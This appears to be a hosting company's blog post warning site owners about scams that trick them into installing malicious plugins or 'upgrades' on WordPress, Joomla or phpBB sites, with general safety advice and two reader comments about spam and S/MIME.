Beware of strangers asking you to install software

Over the past week, we’ve seen customers falling victim to two separate scams that allowed strangers to gain access to their site by installing malicious software.

One of these involves a fake ad agency, and the other involves offers to upgrade outdated software on your site. Don’t fall for these!

What’s new about these?

“Phishing” messages have been around for years. Most of these revolve around the same basic idea: a stranger convinces a user to provide private information in exchange for a product or service. This information can be anything from your bank account number to a username and password.

So what’s different about these new messages? For starters, these newer messages are written by real people using complex language; they don’t look like something generated by an automated script, or by someone who doesn’t speak “business English”. But these messages also exploit another popular trend: content management systems.

Many users now rely on software like WordPress, Joomla, and phpBB to run their Web site. These software packages allow people to create and manage sophisticated Web sites that in the past would have required an experienced (and expensive) Web developer. As a result, users often rely more on third party software, and have become comfortable installing software based on description alone — without knowing how well tested it is or who wrote it. In fact, we’ve written about the threats of untested plugins before.

Both of the scams mentioned above exploit this new behavior. Users have been convinced to install custom software in order to provide a specific feature for their site, only to later find out that the software actually allows “hackers” to access their files and information.

How can I avoid this?

The most important thing to remember is to never give out any personal information to somebody you do not know. You should treat all unsolicited e-mail asking for personal information as a scam unless you can verify otherwise.

Also important is to never install unsolicited software. Stick to well tested software downloaded from verified Web sites. For example, while it doesn’t promise full security, the official WordPress plugins Web site does scan each file uploaded for common bits of malicious code before making them available to users. Combine that with many peer reviews of a popular plugin, and you can feel more assured in the quality and safety of the software you are installing.

Of course, Web site security isn’t completely up to you. We make sure to keep server-wide software updated on our end and to provide as much protection as possible at the server level. If you do your part, too, you’ll reduce the risk of problems dramatically.

2 Comments

  1. Grr..

    I have got so sick of spam I set up a high level spam blocker.

    But now I lose half my emails, especially coming from new senders.

    I dont think there is any answer.

    But I just make sure never to give out any personal details online.

  2. I think the ultimate answer to spam is using S/MIME and authenticating/checking authenticity on every email. However SMTP is a 30 year old technology that we just don’t want to give up. That would mean that everyone would need to purchase a certificate to send email, but then when you get a phishing email you can validate it is not from who they say they are… IMHO